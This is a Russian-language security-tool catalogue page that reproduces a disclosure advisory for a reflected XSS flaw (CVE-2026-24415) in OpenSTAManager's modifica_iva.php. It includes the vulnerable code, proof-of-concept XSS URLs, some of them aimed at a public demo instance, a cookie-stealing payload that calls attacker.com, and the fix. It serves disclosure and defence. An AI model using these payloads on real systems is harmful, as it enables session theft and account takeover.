Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager подвержен XSS в modifica_iva.php через параметр righe | Kitploit
Инструменты/GitHubGitHub/lukasz-rybak/cve-2026-24415
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager подвержен XSS в modifica_iva.php через параметр righe

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24415: OpenSTAManager подвержен XSS-уязвимости в modifica_iva.php через параметр righe

Обзор

ПолеДетали
CVE IDCVE-2026-24415
СерьёзностьMEDIUM
УведомлениеПросмотреть уведомление
ОбнаружилLukasz Rybak

Затронутые продукты

  • devcode-it/openstamanager (версии: < 2.9.8)

Классификация CWE

  • CWE-79: Некорректная нейтрализация входных данных при генерации веб-страницы ('Cross-site Scripting')

Детали

Краткое описание

Множественные отражённые XSS-уязвимости (Reflected Cross-Site Scripting) в OpenSTAManager v2.9.8 позволяют неаутентифицированным злоумышленникам выполнять произвольный JavaScript-код в контексте браузеров других пользователей через специально сформированные параметры URL, что потенциально может привести к перехвату сессий, краже учётных данных и несанкционированным действиям.

Уязвимый параметр: righe (GET)

Подробности

OpenSTAManager v2.9.8 содержит множественные отражённые XSS-уязвимости в модальных окнах изменения счетов, заказов и контрактов. Приложение не выполняет надлежащую санитизацию пользовательского ввода из GET-параметра righe перед его отражением в HTML-выводе.

Расположение уязвимого кода: Файл: /modules/contratti/modals/modifica_iva.php (строка 125)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

Параметр $_GET['righe'] напрямую выводится в HTML-атрибут value без какой-либо санитизации с помощью htmlspecialchars() или эквивалентных функций. Это позволяет злоумышленнику выйти за пределы контекста атрибута и внедрить произвольный HTML/JavaScript.

Все затронутые файлы:

  1. /modules/contratti/modals/modifica_iva.php - строка 125, строка 167
  2. /modules/preventivi/modals/modifica_iva.php - строка 125, строка 167
  3. /modules/fatture/modals/modifica_iva.php - строка 121, строка 161
  4. /modules/ddt/modals/modifica_iva.php - строка 125, строка 167
  5. /modules/ordini/modals/modifica_iva.php - строка 125, строка 167
  6. /modules/interventi/modals/modifica_iva.php - строка 125, строка 167

PoC

Предварительные условия:

  • Запущенный экземпляр OpenSTAManager v2.9.8
  • Действительные учётные данные администратора (имя пользователя: admin, пароль: admin для тестового экземпляра)

Шаг 1: Вход в систему

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Шаг 2: Активация XSS Перейдите по следующему URL в браузере (или используйте curl с cookies):

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

Протестированные URL (все уязвимы):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

Ожидаемый результат: Всплывающее окно JavaScript alert отображает текущий cookie сессии, что подтверждает выполнение кода.

HTML-вывод (проверено на живом экземпляре):

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

Проверка:

изображение
изображение

Альтернативные полезные нагрузки: Кража сессии: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

Воздействие

Затронутые пользователи: Все аутентифицированные пользователи, имеющие доступ к модулям контрактов, счетов, коммерческих предложений или заказов.

Сценарий атаки:

  1. Злоумышленник создаёт вредоносный URL с XSS-полезной нагрузкой
  2. Злоумышленник отправляет URL жертве по электронной почте, через чат или фишингом
  3. Жертва (аутентифицированный пользователь) переходит по ссылке
  4. Вредоносный JavaScript выполняется в контексте браузера жертвы
  5. Злоумышленник может:
    • Похитить cookie сессии → Полный захват учётной записи
    • Выполнять действия от имени жертвы (создание/изменение/удаление записей)
    • Похитить CSRF-токены и обойти защиту CSRF
    • Перенаправить на фишинговую страницу
    • Внедрить кейлоггер для перехвата конфиденциальных данных
    • Изменить содержимое страницы, чтобы обманом вынудить пользователя раскрыть учётные данные

Рекомендуемое исправление:

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

Примените это исправление ко всем затронутым файлам, перечисленным в разделе «Детали».

Ссылки

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

Отказ от ответственности

Эта CVE была раскрыта ответственным образом в соответствии с практиками скоординированного раскрытия уязвимостей. Представленная здесь информация предназначена только для образовательных и защитных целей.

Скачать инструмент